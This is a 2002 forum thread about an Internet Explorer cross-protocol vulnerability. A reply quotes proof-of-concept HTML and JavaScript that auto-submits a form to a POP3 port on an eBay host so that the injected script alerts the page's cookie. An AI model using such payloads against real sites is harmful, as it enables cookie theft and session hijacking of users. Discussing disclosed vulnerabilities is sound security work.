Results 1 to 2 of 2

Thread: New IE vulnerability !!!

  1. February 7th, 2002, 11:33 PM #1
    KOBBRAS
    KOBBRAS is offline
    Banned
    Join Date
    Jan 2002
    Posts
    101

    Cool New IE vulnerability !!!

    A malicious user can create a form which is submitted by the victim (automatically using Active Scripting or manually using Social Engineering). This form can cause a non-HTTP service to echo back JavaScript commands which in turn allow the malicious user to steal the cookie for that domain. There are more uses for this attack, other than just stealing cookies.

    Read full article at www.xatrix.org

    Exploit available.
    Reply With Quote Reply With Quote
  2. February 7th, 2002, 11:44 PM #2
    ac1dsp3ctrum
    ac1dsp3ctrum is offline
    Banned
    Join Date
    Oct 2001
    Posts
    1,459
    Do you work for Xatrix? Oh well... Another good example of Microsoft.... If your using Windows switch to Linux... If you dont want to.... At least use Opera.....
    BTW I like the code they used... Its amazing no one figured this out sooner...
    Code:
    <script>
window.open("http://www.ebay.com","w");
setTimeout("form1.submit()",300);
</script>
<form name="form1" method="post" action="http://thompson.ebay.com:110/" enctype="multipart/form-data">
  <textarea name="eostest">
user <script>alert(document.cookie)</script>
quit
  </textarea>
  <input type="submit" value="Submit">
</form>
    Reply With Quote Reply With Quote
« Previous Thread | Next Thread »

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Forum Rules